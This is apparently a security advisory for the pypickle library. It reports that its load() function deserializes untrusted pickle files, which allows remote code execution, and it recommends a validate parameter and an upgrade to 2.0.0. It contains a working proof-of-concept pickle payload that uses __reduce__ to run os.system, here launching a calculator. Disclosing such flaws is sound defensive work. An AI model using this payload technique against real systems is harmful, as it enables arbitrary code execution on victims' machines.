### Critical Vulnerability Information #### Vulnerability Description - **Issue**: The `load()` function in `pypickle.py` uses Python's `pickle.load()` to deserialize data from files, without validating or sanitizing the input. - **Risk**: If an attacker provides a malicious pickle file, executing it can lead to arbitrary code execution, resulting in a Remote Code Execution (RCE) vulnerability. #### Impact - **Arbitrary Code Execution** - **Remote System Compromise** #### Affected Components - **File**: `pypickle.py` - **Function**: `load()` - **Issue**: `pickle.load()` used without input validation #### Reproduction Steps 1. Clone the repository: `git clone https://github.com/erdogant/pypickle.git` 2. Navigate to the `pypickle` directory: `cd pypickle` 3. Create a malicious `malicious.pkl` file: ```python import pickle import os class Exploit: def __reduce__(self): return (os.system, ("gnome-calculator",)) # Change to 'calc.exe' on Windows with open("malicious.pkl", "wb") as f: pickle.dump(Exploit(), f) ``` 4. Create a `run_exploit.py` file: ```python import pypickle pypickle.load("malicious.pkl") ``` 5. Run `run_exploit.py`: `python3 run_exploit.py` #### Solution - Add a `validate` parameter, defaulting to `True`, to check for high-risk modules and block loading. - Upgrade to version `2.0.0` using `pip install -U pypickle`.